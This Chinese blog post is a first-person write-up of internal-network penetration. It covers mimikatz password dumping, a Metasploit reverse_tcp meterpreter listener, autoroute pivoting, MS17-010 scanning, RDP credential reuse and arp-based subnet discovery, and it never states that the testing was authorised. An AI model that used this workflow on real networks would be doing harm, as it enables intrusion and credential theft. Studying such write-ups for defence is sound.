记一次内网渗透

前言

拿shell过程我就一笔概括好了,毕竟这是主要讲的内网渗透,就是一个上传点无过滤,就这么来的,而且还是administrator权限,于是就有了这篇文章。


0x01

拿到shell后,看了一下是不是在内网环境,然后又看了下是不是在域内,不过很可惜,没有看到域。我先用cs生成个exe,先上线cs先。由于是administrator权限,第一步肯定是先用猕猴桃抓一波密码。

记一次内网渗透

接着当然是配合msf继续接下来的操作。
首先去msf里面监听对应的端口。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
记一次内网渗透
记一次内网渗透

0x02

msf上线了,先添加一下路由表,才能继续接下来的操作。
在meterpreter中:
查看目标内网路由

run get_local_subnets


添加路由

run autoroute -s 192.168.0.0/16


查看是否添加好路由

run autoroute –p
记一次内网渗透

先扫描一下192.168.17.0这个段。

记一次内网渗透

扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看

记一次内网渗透

接下来,当然是先ms17-010啦,内网神器,内网渗透的首选。
使用smb_ms17_010模块探测MS17-010漏洞。

记一次内网渗透
记一次内网渗透

hoo~ 好几台都存在ms17-010,刺激!

记一次内网渗透

然后…… 居然没有一台能正常反弹shell?? 我太难了,难道是内网出不来?还是被waf拦截了?(听说msf里面的17-010失败率很高!)

算了,先扫一下哪些开了3389的。

记一次内网渗透

尝试跑一下一开始获取到的密码,一般来说,在内网基本几个密码可以沦陷很多台服务器。

记一次内网渗透
记一次内网渗透

天呐,怎么回事,居然没有一台的密码和我拿下的那台密码一样,难道我是天谴之人?


0x03

这样下去也不是个办法,扩展其他段,在刷一遍上面的流程。

arp命令

“地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。在解析过IP之后会保存在本地的arp表中,所以使用以下命令可以查看本地的arp缓存表,从中获取到一些IP信息。”

arp -a
记一次内网渗透
记一次内网渗透

等等……

从这里就可以发现了以下几个网段

  • 192.168.1.x
  • 192.168.17.x
  • 192.168.18.x
  • 192.168.20.x
  • 192.168.23.x
  • 192.168.24.x
  • 192.168.26.x
  • 224.x.x.x
  • 225.x.x.x
  • 226.x.x.x
  • 227.x.x.x
  • 228.x.x.x
  • 229.x.x.x
  • 230~9.x.x.x

看到上面整理的信息,懵住了,内网那么大。

同时看了下host文件,看看能不能发现啥。

type c:Windowssystem32driversetchosts
记一次内网渗透

但是很可惜,没有发现到有啥有用的信息。

© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容